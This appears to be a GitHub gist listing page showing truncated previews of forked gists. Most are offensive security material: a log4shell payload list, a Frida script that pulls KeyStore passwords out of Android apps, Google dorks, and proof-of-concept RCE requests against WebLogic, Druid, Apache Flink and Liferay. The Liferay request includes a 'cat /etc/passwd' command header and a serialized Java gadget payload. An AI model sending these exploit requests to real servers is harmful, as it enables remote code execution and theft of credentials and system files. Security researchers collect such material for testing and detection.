This gist gather a list of log4shell payloads seen on my twitter feeds.
💨 I will update it every time I see new payloads.
The goal is to allows testing detection regexes defined in protection systems.
RASSec
/ boto3_ListFilesAWSS3.py
Created
March 23, 2023 04:47
— forked from elisemercury/boto3_ListFilesAWSS3.py
boto3 List Files Contained in an AWS S3 Bucket
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import boto3 | |
| aws_access_key = "###############" | |
| aws_secret_key = "###############" | |
| aws_bucket = "bucket-name" | |
| def list_s3_files(access_key=aws_access_key, secret_key=aws_secret_key, bucket_name=aws_bucket): | |
| # creates a list of all the files in S3 bucket | |
| s3 = boto3.resource('s3', aws_access_key_id=access_key, aws_secret_access_key= secret_key) | |
RASSec
/ log4shell-payloads.md
Created
July 24, 2022 08:35
— forked from righettod/log4shell-payloads.md
List of log4shell payloads seen on my twitter feeds
RASSec
/ frida-extract-keystore.py
Created
October 13, 2021 03:36
— forked from ceres-c/frida-extract-keystore.py
Automatically extract KeyStore objects and relative password from Android applications with Frida - Read more: http://ceres-c.it/frida-android-keystore/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| ''' | |
| author: ceres-c | |
| usage: ./frida-extract-keystore.py | |
| Once the keystore(s) have been exported you have to convert them to PKCS12 using keytool | |
| ''' | |
| import frida, sys, time |
Requests:
POST /api/user/reg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
RASSec
/ CVE-2019-2725.md
Created
February 5, 2021 06:54
— forked from pikpikcu/CVE-2019-2725.md
CVE-2019-2725 weblogic ver:10.3.6 RCE
RASSec
/ CVE-2021-25646.md
Created
February 5, 2021 06:53
— forked from pikpikcu/CVE-2021-25646.md
CVE-2021-25646
POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close
RASSec
/ flink-rce.md
Created
February 5, 2021 06:53
— forked from pikpikcu/flink-rce.md
POC Apache Flink RCE upload file.jar
POST /jars/upload HTTP/1.1
Host: REDACTED:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 187
Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
Accept-Encoding: gzip
--8ce4b16b22b58894aa86c421e8759df3
Content-Disposition: form-data; name="jarfile";filename="pikpikcu.jar"
RASSec
/ LiferayRCE(CVE-2020-7961).md
Created
February 5, 2021 06:49
— forked from pikpikcu/LiferayRCE(CVE-2020-7961).md
POC Liferay RCE(CVE-2020-7961)
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close
cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
RASSec
/ google-dorks
Created
December 28, 2020 10:06
— forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
NewerOlder